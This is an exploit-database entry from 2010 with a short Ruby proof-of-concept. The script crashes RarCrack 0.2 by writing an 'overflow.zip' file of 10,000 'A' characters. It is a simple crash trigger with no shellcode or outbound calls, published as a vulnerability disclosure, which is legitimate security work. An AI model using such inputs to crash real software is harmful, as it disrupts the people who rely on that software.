RarCrack 0.2 – Buffer Overflow (PoC)

  • Author: The_UnKn@wn
    Date: 2010-09-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15054/

    #!/usr/bin/env ruby
    #overflow.rb
    #
    #_______________________________
    # / ____/ __ \/ __ \/ / / / __ \/ ____</
    #/ / __/ /_/ / / / / / / / /_/ /___ \ / / 
    # / /_/ / _, _/ /_/ / /_/ / ____/___/ // /
    # \____/_/ |_|\____/\____/_/ /_____//_/ 
    # 
    #
    # 	Title: 		RarCrack 0.2 Buffer Overflow POC
    # 	Date: 		19.09.2010
    # 	Author: 	The_UnKn@wn
    # 	Email:		the_unknown [at] group51.org
    # 	Twitter:	@The_UnKn0wn
    # 	Homepage:	http://group51.org 	
    # 	Software Link: 	http://sourceforge.net/projects/rarcrack/files/rarcrack-0.2/%5BUnnamed%20release%5D/rarcrack-0.2.tar.bz2/download
    # 	Version: 	0.2
    # 	Tested on: 	openSUSE 11.3
    # 	CVE: 		none 
    #
    #	Impact:		RarCrack doesn't check the length of the archive and while cracking it crashes.
    #
    #	Usage: 
    #		$ ruby overflow.rb
    #		$ ./rarcrack overflow.zip
    #		
    
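    # File contents: 10,000 'A' characters, not a valid ZIP structure
    text = "A"*10000
    
    # Write the test file; puts appends a trailing newline
    File.open("overflow.zip","w") do |l|
    	l.puts(text)
    end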